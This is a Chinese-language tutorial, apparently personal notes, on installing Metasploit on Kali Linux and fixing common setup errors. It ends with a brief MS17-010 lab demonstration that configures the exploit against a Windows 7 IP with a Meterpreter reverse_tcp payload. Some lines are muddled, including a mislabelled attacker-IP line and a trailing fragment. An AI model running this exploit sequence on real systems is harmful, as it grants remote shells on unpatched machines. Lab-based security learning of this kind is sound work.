msf 背景
- Msfconsole:是一个一体化集中控制台,允许你访问到几乎所有的MSF框架选项
metasploit就是一个免费的漏洞框架,利用他人人都是黑客,使用者不需要任何编程基础就可以使用
msf没有更新 1926的渗透攻击数
更新源
命令:
root@kali:~# vi /etc/apt/sources.list
- vi编辑器当中的使用:“ i ”插入添加,esc键退出,“:wq”保存并退出。
编辑输入以下源:
- kali官方源
deb http://http.kali.org/ kali-rolling main non-free contrib
deb-src http://http.kali.org/ kali-rolling main non-free contrib
- 中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
添加数字签名
wget archive.kali.org/archive-key.asc //下载签名(因为中科的源kail不识别,所以一定要加入签名)
apt-key add archive-key.asc //安装签名
注:如果添加数字签名还提示无法安装可删除原有msf
root@kali:~# apt remove metasploit-framework
注:卸载过程中无法获得锁/var/cache/apt/archives/lock - open (11:资源暂时不可用)
无法对目录/var/cache/apt/archives/加锁
root@kali:~# sudo rm /var/cache/apt/archives/lock //进行强制解锁
root@kali:~# sudo rm /var/cache/apt/archives/
以上操作不要做,可能报错需要重装kail的问题!
安装msf框架
root@bogon:~# apt-get update //更新框架
root@kali:~# apt-get install metasploit-framework//安装msf框架
如下界面选yes
如果出现如下报错用一下命令解决:
注意:如果更新完msf出现才下问题
root@kaliew:~# msfconsole
[*] Bundler failed to load and returned this error:
'cannot load such file -- bundler/setup'
[*] You may need to uninstall or upgrade bundler
解决方法:
root@kaliew:~# sudo gem install bundler
root@kaliew:~# bundle update celluloid
root@kali:~# systemctl start postgresql //启动数据库
root@kali:~# systemctl enable postgresql //允许开机自启动
root@kali:~# msfdb init //构建数据库缓存
root@kali:~#msfconsole
ms17-010案例演示
search ms17-010 --- 查询ms17-010
use 2 --- 使用第二条漏洞
set RHOST 192.168.1.123 ---win7环境ip
设置目标主机的IP地址为192.168.1.119 ---kail环境ip
set payload windows/x64/meterpreter/reverse_tcp ---设置payload
show options ---查看需要配置的参数
新增用户同步
